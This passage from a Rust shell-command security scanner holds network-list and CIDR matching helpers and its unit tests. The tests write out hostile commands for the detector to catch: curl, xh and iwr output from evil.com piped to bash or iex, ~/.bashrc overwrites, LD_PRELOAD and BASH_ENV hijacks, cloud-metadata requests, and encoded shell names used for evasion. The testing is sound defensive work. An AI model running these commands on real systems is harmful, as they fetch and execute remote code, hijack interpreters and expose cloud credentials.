1998                            raw: trimmed.to_string(),
1999                        }],
2000                        human_view: None,
2001                        agent_view: None,
2002                        mitre_id: None,
2003                        custom_rule_id: None,
2004                    });
2005                    return findings;
2006                }
2007            }
2008        }
2009    }
2010
2011    findings
2012}
2013
/// Check if a host matches any entry in a network list.
///
/// Supported entry forms:
///
/// * CIDR (`10.0.0.0/8`) — matched against IPv4 hosts.
/// * Hostname (`example.com`) — matches that host and any subdomain
///   (`sub.example.com`), but not look-alikes such as `notexample.com`.
/// * Leading-dot hostname (`.example.com`) — matches subdomains only.
///
/// Hostname comparison is ASCII case-insensitive, and a single trailing root
/// dot on the host or the entry is ignored (`evil.com.` is the same name as
/// `evil.com`). Empty entries never match.
fn matches_network_list(host: &str, list: &[String]) -> bool {
    let host = host.strip_suffix('.').unwrap_or(host);
    list.iter().any(|entry| network_entry_matches(host, entry))
}

/// Match one list entry against an already-normalized host
/// (trailing root dot removed).
fn network_entry_matches(host: &str, entry: &str) -> bool {
    // CIDR match: "10.0.0.0/8". When either side fails to parse, fall
    // through and treat the entry as a plain name.
    if entry.contains('/') {
        if let Some(matched) = cidr_contains(host, entry) {
            return matched;
        }
    }

    let entry = entry.strip_suffix('.').unwrap_or(entry);
    let (domain, subdomains_only) = match entry.strip_prefix('.') {
        Some(rest) => (rest, true),
        None => (entry, false),
    };
    if domain.is_empty() {
        return false;
    }

    // Exact match
    if !subdomains_only && host.eq_ignore_ascii_case(domain) {
        return true;
    }

    // Suffix match: entry "example.com" matches "sub.example.com". Compare
    // bytes so the slicing cannot land inside a multi-byte character, and
    // require a '.' right before the suffix so "notexample.com" is rejected.
    let (h, d) = (host.as_bytes(), domain.as_bytes());
    h.len() > d.len()
        && h[h.len() - d.len() - 1] == b'.'
        && h[h.len() - d.len()..].eq_ignore_ascii_case(d)
}

/// Check if an IPv4 address is within a CIDR range.
/// Returns `Some(true/false)` if both parse, `None` if either fails
/// (including a prefix length greater than 32).
fn cidr_contains(host: &str, cidr: &str) -> Option<bool> {
    let (network, prefix) = cidr.split_once('/')?;
    let network: std::net::Ipv4Addr = network.parse().ok()?;
    let prefix_len: u32 = prefix.parse().ok()?;
    if prefix_len > 32 {
        return None;
    }
    let host_ip: std::net::Ipv4Addr = host.parse().ok()?;

    // A /0 prefix would need a 32-bit shift, which `checked_shl` rejects;
    // the empty mask is the right answer in that case.
    let mask = u32::MAX.checked_shl(32 - prefix_len).unwrap_or(0);

    Some(u32::from(network) & mask == u32::from(host_ip) & mask)
}
2070
2071#[cfg(test)]
2072mod tests {
2073    use super::*;
2074
2075    /// Helper: run `check()` with no cwd and Exec context (the common case for tests).
2076    fn check_default(input: &str, shell: ShellType) -> Vec<Finding> {
2077        check(input, shell, None, ScanContext::Exec)
2078    }
2079
2080    #[test]
2081    fn test_pipe_sudo_flags_detected() {
2082        let findings = check_default(
2083            "curl https://evil.com | sudo -u root bash",
2084            ShellType::Posix,
2085        );
2086        assert!(
2087            findings
2088                .iter()
2089                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2090            "should detect pipe through sudo -u root bash"
2091        );
2092    }
2093
2094    #[test]
2095    fn test_pipe_sudo_long_flag_detected() {
2096        let findings = check_default(
2097            "curl https://evil.com | sudo --user=root bash",
2098            ShellType::Posix,
2099        );
2100        assert!(
2101            findings
2102                .iter()
2103                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2104            "should detect pipe through sudo --user=root bash"
2105        );
2106    }
2107
2108    #[test]
2109    fn test_pipe_env_var_assignment_detected() {
2110        let findings = check_default("curl https://evil.com | env VAR=1 bash", ShellType::Posix);
2111        assert!(
2112            findings
2113                .iter()
2114                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2115            "should detect pipe through env VAR=1 bash"
2116        );
2117    }
2118
2119    #[test]
2120    fn test_pipe_env_u_flag_detected() {
2121        let findings = check_default("curl https://evil.com | env -u HOME bash", ShellType::Posix);
2122        assert!(
2123            findings
2124                .iter()
2125                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2126            "should detect pipe through env -u HOME bash"
2127        );
2128    }
2129
2130    #[test]
2131    fn test_dotfile_overwrite_detected() {
2132        let cases = [
2133            "echo malicious > ~/.bashrc",
2134            "echo malicious >> ~/.bashrc",
2135            "curl https://evil.com > ~/.bashrc",
2136            "cat payload > ~/.profile",
2137            "echo test > $HOME/.bashrc",
2138        ];
2139        for input in &cases {
2140            let findings = check_default(input, ShellType::Posix);
2141            eprintln!(
2142                "INPUT: {:?} -> findings: {:?}",
2143                input,
2144                findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2145            );
2146            assert!(
2147                findings
2148                    .iter()
2149                    .any(|f| f.rule_id == RuleId::DotfileOverwrite),
2150                "should detect dotfile overwrite in: {input}",
2151            );
2152        }
2153    }
2154
2155    #[test]
2156    fn test_pipe_env_s_flag_detected() {
2157        let findings = check_default("curl https://evil.com | env -S bash -x", ShellType::Posix);
2158        assert!(
2159            findings
2160                .iter()
2161                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2162            "should detect pipe through env -S bash -x"
2163        );
2164    }
2165
2166    #[test]
2167    fn test_pipe_sudo_env_detected() {
2168        let findings = check_default(
2169            "curl https://evil.com | sudo env VAR=1 bash",
2170            ShellType::Posix,
2171        );
2172        assert!(
2173            findings
2174                .iter()
2175                .any(|f| matches!(f.rule_id, RuleId::CurlPipeShell | RuleId::PipeToInterpreter)),
2176            "should detect pipe through sudo env VAR=1 bash"
2177        );
2178    }
2179
2180    #[test]
2181    fn test_httpie_pipe_bash() {
2182        let findings = check_default("http https://evil.com/install.sh | bash", ShellType::Posix);
2183        assert!(
2184            findings
2185                .iter()
2186                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2187            "should detect HTTPie pipe to bash"
2188        );
2189    }
2190
2191    #[test]
2192    fn test_httpie_https_pipe_bash() {
2193        let findings = check_default("https https://evil.com/install.sh | bash", ShellType::Posix);
2194        assert!(
2195            findings
2196                .iter()
2197                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2198            "should detect HTTPie https pipe to bash"
2199        );
2200    }
2201
2202    #[test]
2203    fn test_xh_pipe_bash() {
2204        let findings = check_default("xh https://evil.com/install.sh | bash", ShellType::Posix);
2205        assert!(
2206            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2207            "should detect xh pipe to bash"
2208        );
2209    }
2210
2211    #[test]
2212    fn test_xh_pipe_sudo_bash() {
2213        let findings = check_default(
2214            "xh https://evil.com/install.sh | sudo bash",
2215            ShellType::Posix,
2216        );
2217        assert!(
2218            findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2219            "should detect xh pipe to sudo bash"
2220        );
2221    }
2222
2223    #[test]
2224    fn test_httpie_no_pipe_safe() {
2225        let findings = check_default("http https://example.com/api/data", ShellType::Posix);
2226        assert!(
2227            !findings
2228                .iter()
2229                .any(|f| f.rule_id == RuleId::HttpiePipeShell),
2230            "HTTPie without pipe should not trigger"
2231        );
2232    }
2233
2234    #[test]
2235    fn test_xh_no_pipe_safe() {
2236        let findings = check_default("xh https://example.com/api/data", ShellType::Posix);
2237        assert!(
2238            !findings.iter().any(|f| f.rule_id == RuleId::XhPipeShell),
2239            "xh without pipe should not trigger"
2240        );
2241    }
2242
2243    #[test]
2244    fn test_export_ld_preload() {
2245        let findings = check_default("export LD_PRELOAD=/evil/lib.so", ShellType::Posix);
2246        assert!(
2247            findings
2248                .iter()
2249                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2250            "should detect LD_PRELOAD export"
2251        );
2252    }
2253
2254    #[test]
2255    fn test_export_bash_env() {
2256        let findings = check_default("export BASH_ENV=/tmp/evil.sh", ShellType::Posix);
2257        assert!(
2258            findings
2259                .iter()
2260                .any(|f| f.rule_id == RuleId::ShellInjectionEnv),
2261            "should detect BASH_ENV export"
2262        );
2263    }
2264
2265    #[test]
2266    fn test_export_pythonpath() {
2267        let findings = check_default("export PYTHONPATH=/evil/modules", ShellType::Posix);
2268        assert!(
2269            findings
2270                .iter()
2271                .any(|f| f.rule_id == RuleId::InterpreterHijackEnv),
2272            "should detect PYTHONPATH export"
2273        );
2274    }
2275
2276    #[test]
2277    fn test_export_openai_key() {
2278        let findings = check_default("export OPENAI_API_KEY=sk-abc123", ShellType::Posix);
2279        assert!(
2280            findings
2281                .iter()
2282                .any(|f| f.rule_id == RuleId::SensitiveEnvExport),
2283            "should detect OPENAI_API_KEY export"
2284        );
2285    }
2286
2287    #[test]
2288    fn test_export_path_safe() {
2289        let findings = check_default("export PATH=/usr/bin:$PATH", ShellType::Posix);
2290        assert!(
2291            !findings.iter().any(|f| matches!(
2292                f.rule_id,
2293                RuleId::CodeInjectionEnv
2294                    | RuleId::ShellInjectionEnv
2295                    | RuleId::InterpreterHijackEnv
2296                    | RuleId::SensitiveEnvExport
2297            )),
2298            "export PATH should not trigger env var detection"
2299        );
2300    }
2301
2302    #[test]
2303    fn test_env_ld_preload_cmd() {
2304        let findings = check_default(
2305            "env LD_PRELOAD=/evil/lib.so /usr/bin/target",
2306            ShellType::Posix,
2307        );
2308        assert!(
2309            findings
2310                .iter()
2311                .any(|f| f.rule_id == RuleId::CodeInjectionEnv),
2312            "should detect LD_PRELOAD via env command"
2313        );
2314    }
2315
2316    #[test]
2317    fn test_curl_metadata_endpoint() {
2318        let findings = check_default(
2319            "curl http://169.254.169.254/latest/meta-data",
2320            ShellType::Posix,
2321        );
2322        assert!(
2323            findings
2324                .iter()
2325                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2326            "should detect AWS metadata endpoint"
2327        );
2328    }
2329
2330    #[test]
2331    fn test_curl_private_network() {
2332        let findings = check_default("curl http://10.0.0.1/internal/api", ShellType::Posix);
2333        assert!(
2334            findings
2335                .iter()
2336                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2337            "should detect private network access"
2338        );
2339    }
2340
2341    #[test]
2342    fn test_curl_public_ip_safe() {
2343        let findings = check_default("curl http://8.8.8.8/dns-query", ShellType::Posix);
2344        assert!(
2345            !findings.iter().any(|f| matches!(
2346                f.rule_id,
2347                RuleId::MetadataEndpoint | RuleId::PrivateNetworkAccess
2348            )),
2349            "public IP should not trigger network destination detection"
2350        );
2351    }
2352
2353    #[test]
2354    fn test_metadata_bare_ip() {
2355        let findings = check_default("curl 169.254.169.254/latest/meta-data", ShellType::Posix);
2356        assert!(
2357            findings
2358                .iter()
2359                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2360            "should detect bare IP metadata endpoint"
2361        );
2362    }
2363
2364    #[test]
2365    fn test_extract_host_from_url() {
2366        assert_eq!(
2367            extract_host_from_arg("http://169.254.169.254/latest"),
2368            Some("169.254.169.254".to_string())
2369        );
2370        assert_eq!(
2371            extract_host_from_arg("http://10.0.0.1:8080/api"),
2372            Some("10.0.0.1".to_string())
2373        );
2374        assert_eq!(
2375            extract_host_from_arg("169.254.169.254/path"),
2376            Some("169.254.169.254".to_string())
2377        );
2378        assert_eq!(
2379            extract_host_from_arg("8.8.8.8"),
2380            Some("8.8.8.8".to_string())
2381        );
2382        assert_eq!(extract_host_from_arg("-H"), None);
2383        assert_eq!(extract_host_from_arg("output.txt"), None);
2384    }
2385
2386    // --- Network policy tests ---
2387
2388    #[test]
2389    fn test_network_policy_deny_exact() {
2390        let deny = vec!["evil.com".to_string()];
2391        let allow = vec![];
2392        let findings = check_network_policy(
2393            "curl https://evil.com/data",
2394            ShellType::Posix,
2395            &deny,
2396            &allow,
2397        );
2398        assert_eq!(findings.len(), 1);
2399        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2400    }
2401
2402    #[test]
2403    fn test_network_policy_deny_subdomain() {
2404        let deny = vec!["evil.com".to_string()];
2405        let allow = vec![];
2406        let findings = check_network_policy(
2407            "wget https://sub.evil.com/data",
2408            ShellType::Posix,
2409            &deny,
2410            &allow,
2411        );
2412        assert_eq!(findings.len(), 1);
2413        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2414    }
2415
2416    #[test]
2417    fn test_network_policy_deny_cidr() {
2418        let deny = vec!["10.0.0.0/8".to_string()];
2419        let allow = vec![];
2420        let findings =
2421            check_network_policy("curl http://10.1.2.3/api", ShellType::Posix, &deny, &allow);
2422        assert_eq!(findings.len(), 1);
2423        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2424    }
2425
2426    #[test]
2427    fn test_network_policy_allow_exempts() {
2428        let deny = vec!["evil.com".to_string()];
2429        let allow = vec!["safe.evil.com".to_string()];
2430        let findings = check_network_policy(
2431            "curl https://safe.evil.com/data",
2432            ShellType::Posix,
2433            &deny,
2434            &allow,
2435        );
2436        assert_eq!(findings.len(), 0, "allow list should exempt from deny");
2437    }
2438
2439    #[test]
2440    fn test_network_policy_no_match() {
2441        let deny = vec!["evil.com".to_string()];
2442        let allow = vec![];
2443        let findings = check_network_policy(
2444            "curl https://example.com/data",
2445            ShellType::Posix,
2446            &deny,
2447            &allow,
2448        );
2449        assert_eq!(findings.len(), 0);
2450    }
2451
2452    #[test]
2453    fn test_network_policy_empty_deny() {
2454        let deny = vec![];
2455        let allow = vec![];
2456        let findings =
2457            check_network_policy("curl https://evil.com", ShellType::Posix, &deny, &allow);
2458        assert_eq!(
2459            findings.len(),
2460            0,
2461            "empty deny list should produce no findings"
2462        );
2463    }
2464
2465    #[test]
2466    fn test_cidr_contains() {
2467        assert_eq!(cidr_contains("10.0.0.1", "10.0.0.0/8"), Some(true));
2468        assert_eq!(cidr_contains("10.255.255.255", "10.0.0.0/8"), Some(true));
2469        assert_eq!(cidr_contains("11.0.0.1", "10.0.0.0/8"), Some(false));
2470        assert_eq!(cidr_contains("192.168.1.1", "192.168.0.0/16"), Some(true));
2471        assert_eq!(cidr_contains("192.169.1.1", "192.168.0.0/16"), Some(false));
2472        assert_eq!(cidr_contains("not-an-ip", "10.0.0.0/8"), None);
2473        assert_eq!(cidr_contains("10.0.0.1", "invalid"), None);
2474    }
2475
2476    #[test]
2477    fn test_matches_network_list_hostname() {
2478        let list = vec!["evil.com".to_string(), "bad.org".to_string()];
2479        assert!(matches_network_list("evil.com", &list));
2480        assert!(matches_network_list("sub.evil.com", &list));
2481        assert!(!matches_network_list("notevil.com", &list));
2482        assert!(!matches_network_list("good.com", &list));
2483    }
2484
2485    #[test]
2486    fn test_flag_value_url_detected_in_network_policy() {
2487        let deny = vec!["evil.com".to_string()];
2488        let allow = vec![];
2489        let findings = check_network_policy(
2490            "curl --url=http://evil.com/data",
2491            ShellType::Posix,
2492            &deny,
2493            &allow,
2494        );
2495        assert_eq!(findings.len(), 1, "should detect denied host in --flag=URL");
2496        assert_eq!(findings[0].rule_id, RuleId::CommandNetworkDeny);
2497    }
2498
2499    #[test]
2500    fn test_flag_value_url_metadata_endpoint() {
2501        let findings = check(
2502            "curl --url=http://169.254.169.254/latest/meta-data",
2503            ShellType::Posix,
2504            None,
2505            ScanContext::Exec,
2506        );
2507        assert!(
2508            findings
2509                .iter()
2510                .any(|f| f.rule_id == RuleId::MetadataEndpoint),
2511            "should detect metadata endpoint in --flag=URL"
2512        );
2513    }
2514
2515    #[test]
2516    fn test_flag_value_url_private_network() {
2517        let findings = check(
2518            "curl --url=http://10.0.0.1/internal",
2519            ShellType::Posix,
2520            None,
2521            ScanContext::Exec,
2522        );
2523        assert!(
2524            findings
2525                .iter()
2526                .any(|f| f.rule_id == RuleId::PrivateNetworkAccess),
2527            "should detect private network in --flag=URL"
2528        );
2529    }
2530
2531    #[test]
2532    fn test_strip_port_unbracketed_ipv6() {
2533        assert_eq!(strip_port("fe80::1"), "fe80::1");
2534    }
2535
2536    #[test]
2537    fn test_vet_not_configured_fires_without_supply_chain() {
2538        let dir = tempfile::tempdir().unwrap();
2539        let cwd = dir.path().to_str().unwrap();
2540        let findings = check(
2541            "cargo install serde_json",
2542            ShellType::Posix,
2543            Some(cwd),
2544            ScanContext::Exec,
2545        );
2546        assert!(findings
2547            .iter()
2548            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2549    }
2550
2551    #[test]
2552    fn test_vet_not_configured_suppressed_with_supply_chain() {
2553        let dir = tempfile::tempdir().unwrap();
2554        let sc_dir = dir.path().join("supply-chain");
2555        std::fs::create_dir_all(&sc_dir).unwrap();
2556        std::fs::write(sc_dir.join("config.toml"), "").unwrap();
2557        let cwd = dir.path().to_str().unwrap();
2558        let findings = check(
2559            "cargo install serde_json",
2560            ShellType::Posix,
2561            Some(cwd),
2562            ScanContext::Exec,
2563        );
2564        assert!(!findings
2565            .iter()
2566            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2567    }
2568
2569    #[test]
2570    fn test_vet_not_configured_skips_non_install() {
2571        let dir = tempfile::tempdir().unwrap();
2572        let cwd = dir.path().to_str().unwrap();
2573        let findings = check(
2574            "cargo build",
2575            ShellType::Posix,
2576            Some(cwd),
2577            ScanContext::Exec,
2578        );
2579        assert!(!findings
2580            .iter()
2581            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2582    }
2583
2584    #[test]
2585    fn test_vet_detects_cargo_with_flags() {
2586        let dir = tempfile::tempdir().unwrap();
2587        let cwd = dir.path().to_str().unwrap();
2588        let f1 = check(
2589            "cargo --locked install serde",
2590            ShellType::Posix,
2591            Some(cwd),
2592            ScanContext::Exec,
2593        );
2594        assert!(f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2595        let f2 = check(
2596            "cargo +nightly add tokio",
2597            ShellType::Posix,
2598            Some(cwd),
2599            ScanContext::Exec,
2600        );
2601        assert!(f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2602        let f3 = check(
2603            "cargo -Z sparse-registry install serde",
2604            ShellType::Posix,
2605            Some(cwd),
2606            ScanContext::Exec,
2607        );
2608        assert!(f3.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2609    }
2610
2611    #[test]
2612    fn test_vet_skipped_in_paste_context() {
2613        let dir = tempfile::tempdir().unwrap();
2614        let cwd = dir.path().to_str().unwrap();
2615        let findings = check(
2616            "cargo install serde_json",
2617            ShellType::Posix,
2618            Some(cwd),
2619            ScanContext::Paste,
2620        );
2621        assert!(!findings
2622            .iter()
2623            .any(|f| f.rule_id == RuleId::VetNotConfigured));
2624    }
2625
2626    #[test]
2627    fn test_vet_no_false_positive_on_non_install_subcommand() {
2628        let dir = tempfile::tempdir().unwrap();
2629        let cwd = dir.path().to_str().unwrap();
2630        let f1 = check(
2631            "cargo test --package add",
2632            ShellType::Posix,
2633            Some(cwd),
2634            ScanContext::Exec,
2635        );
2636        assert!(!f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2637        let f2 = check(
2638            "cargo build install",
2639            ShellType::Posix,
2640            Some(cwd),
2641            ScanContext::Exec,
2642        );
2643        assert!(!f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured));
2644    }
2645
2646    #[test]
2647    fn test_vet_detects_cargo_exe_windows_path() {
2648        let dir = tempfile::tempdir().unwrap();
2649        let cwd = dir.path().to_str().unwrap();
2650        let f1 = check(
2651            r"C:\Users\dev\.cargo\bin\cargo.exe install serde",
2652            ShellType::PowerShell,
2653            Some(cwd),
2654            ScanContext::Exec,
2655        );
2656        assert!(
2657            f1.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2658            "should detect cargo.exe with Windows backslash path"
2659        );
2660        let f2 = check(
2661            r"C:\Users\dev\.cargo\bin\CARGO.EXE install serde",
2662            ShellType::PowerShell,
2663            Some(cwd),
2664            ScanContext::Exec,
2665        );
2666        assert!(
2667            f2.iter().any(|f| f.rule_id == RuleId::VetNotConfigured),
2668            "should detect CARGO.EXE case-insensitively"
2669        );
2670    }
2671
2672    // ── normalize_shell_token unit tests ──
2673
2674    #[test]
2675    fn test_normalize_ansi_c_basic() {
2676        assert_eq!(normalize_shell_token("$'bash'", ShellType::Posix), "bash");
2677    }
2678
2679    #[test]
2680    fn test_normalize_ansi_c_hex() {
2681        assert_eq!(
2682            normalize_shell_token("$'\\x62\\x61\\x73\\x68'", ShellType::Posix),
2683            "bash"
2684        );
2685    }
2686
2687    #[test]
2688    fn test_normalize_ansi_c_octal() {
2689        assert_eq!(
2690            normalize_shell_token("$'\\142\\141\\163\\150'", ShellType::Posix),
2691            "bash"
2692        );
2693    }
2694
2695    #[test]
2696    fn test_normalize_ansi_c_octal_leading_zero() {
2697        // \057 = '/' (octal 057 = 47 decimal = '/')
2698        assert_eq!(
2699            normalize_shell_token("$'\\057bin\\057bash'", ShellType::Posix),
2700            "/bin/bash"
2701        );
2702    }
2703
2704    #[test]
2705    fn test_normalize_ansi_c_bare_zero() {
2706        // \0 alone (no following octal digits) should still be NUL
2707        assert_eq!(normalize_shell_token("$'a\\0b'", ShellType::Posix), "a\0b");
2708    }
2709
2710    #[test]
2711    fn test_normalize_ansi_c_unicode() {
2712        assert_eq!(
2713            normalize_shell_token("$'\\u0062ash'", ShellType::Posix),
2714            "bash"
2715        );
2716    }
2717
2718    #[test]
2719    fn test_normalize_double_quotes() {
2720        assert_eq!(normalize_shell_token("\"bash\"", ShellType::Posix), "bash");
2721    }
2722
2723    #[test]
2724    fn test_normalize_cmd_caret_inside_double_quotes() {
2725        assert_eq!(normalize_shell_token("\"c^md\"", ShellType::Cmd), "cmd");
2726    }
2727
2728    #[test]
2729    fn test_normalize_single_quotes() {
2730        assert_eq!(normalize_shell_token("'bash'", ShellType::Posix), "bash");
2731    }
2732
2733    #[test]
2734    fn test_normalize_backslash() {
2735        assert_eq!(normalize_shell_token("ba\\sh", ShellType::Posix), "bash");
2736    }
2737
2738    #[test]
2739    fn test_normalize_empty_concat() {
2740        assert_eq!(normalize_shell_token("ba''sh", ShellType::Posix), "bash");
2741    }
2742
2743    #[test]
2744    fn test_normalize_mixed_concat() {
2745        assert_eq!(normalize_shell_token("'ba'sh", ShellType::Posix), "bash");
2746    }
2747
2748    #[test]
2749    fn test_normalize_powershell_backtick() {
2750        assert_eq!(
2751            normalize_shell_token("`i`e`x", ShellType::PowerShell),
2752            "iex"
2753        );
2754    }
2755
2756    #[test]
2757    fn test_normalize_unclosed_single_quote() {
2758        // Unclosed quote: everything after ' is literal, state ends in SINGLE_QUOTE
2759        let result = normalize_shell_token("'bash", ShellType::Posix);
2760        assert_eq!(result, "bash");
2761    }
2762
2763    #[test]
2764    fn test_normalize_unclosed_double_quote() {
2765        let result = normalize_shell_token("\"bash", ShellType::Posix);
2766        assert_eq!(result, "bash");
2767    }
2768
2769    // ── normalize_cmd_base unit tests ──
2770
2771    #[test]
2772    fn test_cmd_base_path() {
2773        assert_eq!(
2774            normalize_cmd_base("/usr/bin/bash", ShellType::Posix),
2775            "bash"
2776        );
2777    }
2778
2779    #[test]
2780    fn test_cmd_base_ansi_c() {
2781        assert_eq!(normalize_cmd_base("$'bash'", ShellType::Posix), "bash");
2782    }
2783
2784    #[test]
2785    fn test_cmd_base_exe() {
2786        assert_eq!(normalize_cmd_base("bash.exe", ShellType::Posix), "bash");
2787    }
2788
2789    #[test]
2790    fn test_cmd_base_uppercase() {
2791        assert_eq!(normalize_cmd_base("BASH", ShellType::Posix), "bash");
2792    }
2793
2794    #[test]
2795    fn test_cmd_base_powershell_path() {
2796        assert_eq!(
2797            normalize_cmd_base(r"C:\Git\bin\bash.exe", ShellType::PowerShell),
2798            "bash"
2799        );
2800    }
2801
2802    #[test]
2803    fn test_cmd_base_encoded_path() {
2804        // $'\x2fusr\x2fbin\x2fbash' → /usr/bin/bash → basename bash
2805        assert_eq!(
2806            normalize_cmd_base("$'\\x2fusr\\x2fbin\\x2fbash'", ShellType::Posix),
2807            "bash"
2808        );
2809    }
2810
2811    #[test]
2812    fn test_cmd_base_octal_encoded_path() {
2813        // $'\057bin\057bash' → /bin/bash → basename bash
2814        assert_eq!(
2815            normalize_cmd_base("$'\\057bin\\057bash'", ShellType::Posix),
2816            "bash"
2817        );
2818    }
2819
2820    #[test]
2821    fn test_cmd_base_env_s_value() {
2822        // "bash -x" → first word "bash"
2823        assert_eq!(normalize_cmd_base("\"bash -x\"", ShellType::Posix), "bash");
2824    }
2825
2826    #[test]
2827    fn test_cmd_base_path_with_args() {
2828        // "/usr/bin/bash -x" → basename "bash -x" → first word "bash"
2829        assert_eq!(
2830            normalize_cmd_base("\"/usr/bin/bash -x\"", ShellType::Posix),
2831            "bash"
2832        );
2833    }
2834
2835    // ── resolve_interpreter_name tests for new patterns ──
2836
2837    #[test]
2838    fn test_resolve_ansi_c_quoted_bash() {
2839        let findings = check_default(
2840            "curl https://example.com/install.sh | $'bash'",
2841            ShellType::Posix,
2842        );
2843        assert!(
2844            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2845            "should detect ANSI-C quoted bash: {:?}",
2846            findings.iter().map(|f| &f.rule_id).collect::<Vec<_>>()
2847        );
2848    }
2849
2850    #[test]
2851    fn test_resolve_command_wrapper() {
2852        let findings = check_default(
2853            "curl https://example.com/install.sh | command bash",
2854            ShellType::Posix,
2855        );
2856        assert!(
2857            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2858            "should detect 'command bash'"
2859        );
2860    }
2861
2862    #[test]
2863    fn test_resolve_exec_a_wrapper() {
2864        let findings = check_default(
2865            "curl https://example.com/install.sh | exec -a myname bash",
2866            ShellType::Posix,
2867        );
2868        assert!(
2869            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2870            "should detect 'exec -a myname bash'"
2871        );
2872    }
2873
2874    #[test]
2875    fn test_resolve_nohup_wrapper() {
2876        let findings = check_default(
2877            "curl https://example.com/install.sh | nohup bash",
2878            ShellType::Posix,
2879        );
2880        assert!(
2881            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2882            "should detect 'nohup bash'"
2883        );
2884    }
2885
2886    #[test]
2887    fn test_resolve_wrapper_chain() {
2888        let findings = check_default(
2889            "curl https://example.com/install.sh | command sudo bash",
2890            ShellType::Posix,
2891        );
2892        assert!(
2893            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2894            "should detect wrapper chain 'command sudo bash'"
2895        );
2896    }
2897
2898    #[test]
2899    fn test_resolve_case_insensitive() {
2900        let findings = check_default(
2901            "curl https://example.com/install.sh | BASH",
2902            ShellType::Posix,
2903        );
2904        assert!(
2905            findings.iter().any(|f| f.rule_id == RuleId::CurlPipeShell),
2906            "should detect uppercase BASH"
2907        );
2908    }
2909
2910    #[test]
2911    fn test_resolve_powershell_backtick_iex() {
2912        let findings = check_default(
2913            "iwr https://evil.com/script.ps1 | `i`e`x",
2914            ShellType::PowerShell,
2915        );
2916        assert!(
2917            findings
2918                .iter()
2919                .any(|f| f.rule_id == RuleId::PipeToInterpreter),
2920            "should detect PowerShell backtick-escaped iex"
2921        );
2922    }
2923
2924    // --- Remediation hint tests ---
2925
2926    #[test]
2927    fn test_pipe_to_interpreter_hint_with_url() {
2928        let input = "curl https://example.com/install.sh | bash";
2929        let segments = tokenize::tokenize(input, ShellType::Posix);
2930        let mut findings = Vec::new();
2931        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2932        assert_eq!(findings.len(), 1);
2933        assert!(
2934            findings[0]
2935                .description
2936                .contains("https://example.com/install.sh"),
2937            "should include extracted URL in hint"
2938        );
2939        assert!(
2940            findings[0].description.contains("getvet.sh"),
2941            "should mention vet"
2942        );
2943        if cfg!(unix) {
2944            assert!(
2945                findings[0].description.contains("tirith run"),
2946                "Unix builds should suggest tirith run"
2947            );
2948        }
2949    }
2950
2951    #[test]
2952    fn test_pipe_to_interpreter_hint_quoted_url() {
2953        let input = r#"curl "https://example.com/install.sh" | bash"#;
2954        let segments = tokenize::tokenize(input, ShellType::Posix);
2955        let mut findings = Vec::new();
2956        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2957        assert_eq!(findings.len(), 1);
2958        assert!(
2959            findings[0]
2960                .description
2961                .contains("https://example.com/install.sh"),
2962            "should extract URL from quoted arg"
2963        );
2964    }
2965
2966    #[test]
2967    fn test_pipe_to_interpreter_hint_flag_equals_url() {
2968        let input = "curl --url=https://example.com/install.sh | bash";
2969        let segments = tokenize::tokenize(input, ShellType::Posix);
2970        let mut findings = Vec::new();
2971        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2972        assert_eq!(findings.len(), 1);
2973        assert!(
2974            findings[0]
2975                .description
2976                .contains("https://example.com/install.sh"),
2977            "should extract URL from --flag=value"
2978        );
2979    }
2980
2981    #[test]
2982    fn test_pipe_to_interpreter_evidence_includes_all_source_urls() {
2983        let input =
2984            "curl https://trusted.example.com/install.sh https://evil.example.com/payload.sh | bash";
2985        let segments = tokenize::tokenize(input, ShellType::Posix);
2986        let mut findings = Vec::new();
2987        check_pipe_to_interpreter(&segments, ShellType::Posix, &mut findings);
2988        assert_eq!(findings.len(), 1);
2989
2990        let urls: Vec<&str> = findings[0]
2991            .evidence
2992            .iter()
2993            .filter_map(|e| match e {
2994                Evidence::Url { raw } => Some(raw.as_str()),
2995                _ => None,
2996            })
2997            .collect();
2998
2999        assert_eq!(
3000            urls.len(),
3001            2,
3002            "all source URLs must be preserved in evidence"
3003        );
3004        assert!(urls.contains(&"https://trusted.example.com/install.sh"));
3005        assert!(urls.contains(&"https://evil.example.com/payload.sh"));
3006    }
3007
3008    #[test]
3009    fn test_pipe_to_interpreter_no_hint_for_cat() {
3010        let input = "cat /tmp/script.sh | bash";
3011        let segments = tokenize::tokenize(input, ShellType::Posix);
3012        let mut findings = Vec::new();
